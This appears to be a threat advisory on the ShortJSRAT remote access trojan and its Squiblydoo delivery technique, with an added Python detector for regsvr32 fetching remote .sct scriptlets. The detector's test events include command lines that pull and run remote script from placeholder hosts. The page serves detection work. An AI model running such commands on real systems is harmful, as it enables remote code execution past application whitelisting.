ShortJSRAT is a remote access trojan (RAT) that uses cloud apps to deliver malicious Windows Script Component scriptlet files, which carry a .sct extension. Downloading and executing scriptlets hosted on cloud apps makes detection and remediation of the attack more difficult. The cloud apps deliver the second-stage payloads via the Squiblydoo technique, which uses native Windows applications to bypass application whitelisting solutions. Researchers discovered multiple variants of ShortJSRAT malware using the Squiblydoo technique. Currently, all affected systems are running the Windows operating system. ShortJSRAT has predominantly affected users in Brazil, and current information suggests that the threat actors are based in Brazil. Other victims are located in the USA, India, Spain, and Germany, among others.
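
A detection check for the Squiblydoo pattern described above, as an added example that is not from the original page or from Netskope's analysis: it flags process-creation events in which regsvr32.exe is handed a remote URL through its /i: argument together with scrobj.dll. The event field names are assumed to follow Sysmon process-creation events, and all hosts, paths and events are constructed.

```python
import re
from urllib.parse import urlsplit

# /i:<value> argument of regsvr32; Squiblydoo supplies a remote URL here.
I_ARG = re.compile(r'(?:^|\s)[/-]i:"?(?P<url>https?://[^\s"]+)', re.IGNORECASE)
# scrobj.dll (the script component runtime) named as the DLL to register.
SCROBJ = re.compile(r'(?:^|[\s\\/"])scrobj(?:\.dll)?(?=$|[\s"])', re.IGNORECASE)


def basename(path):
    return re.split(r"[\\/]", path or "")[-1].lower()


def detect_squiblydoo(event):
    """Return host/url/sct details for a matching event, else None."""
    # OriginalFileName still identifies regsvr32 when the binary was copied and renamed.
    names = {basename(event.get("Image")), (event.get("OriginalFileName") or "").lower()}
    if "regsvr32.exe" not in names:
        return None
    cmd = event.get("CommandLine") or ""
    match = I_ARG.search(cmd)
    if not match or not SCROBJ.search(cmd):
        return None
    url = match.group("url")
    parts = urlsplit(url)
    # The host is what a responder checks against sanctioned cloud apps.
    return {"host": parts.hostname, "url": url, "sct": parts.path.lower().endswith(".sct")}


# Constructed process-creation events (hosts and paths are placeholders).
EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /i:https://files.cloud-storage.example/docs/update.sct scrobj.dll"},
    {"Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": 'svc.exe -s -i:"http://cdn.example/a1B2" scrobj.dll'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\App\plugin.dll"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://files.cloud-storage.example/docs/update.sct"},
]


def scan(events):
    """Return (index, finding) pairs for events that match the pattern."""
    return [(i, hit) for i, e in enumerate(events) if (hit := detect_squiblydoo(e))]


if __name__ == "__main__":
    for index, finding in scan(EVENTS):
        print(index, finding)
```

The second event matches even though the URL does not end in .sct and the binary was renamed, so the check keys on the regsvr32, /i: URL and scrobj.dll combination rather than on the file extension.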

Technical Details

  • Netskope provides a technical analysis of ShortJSRAT here.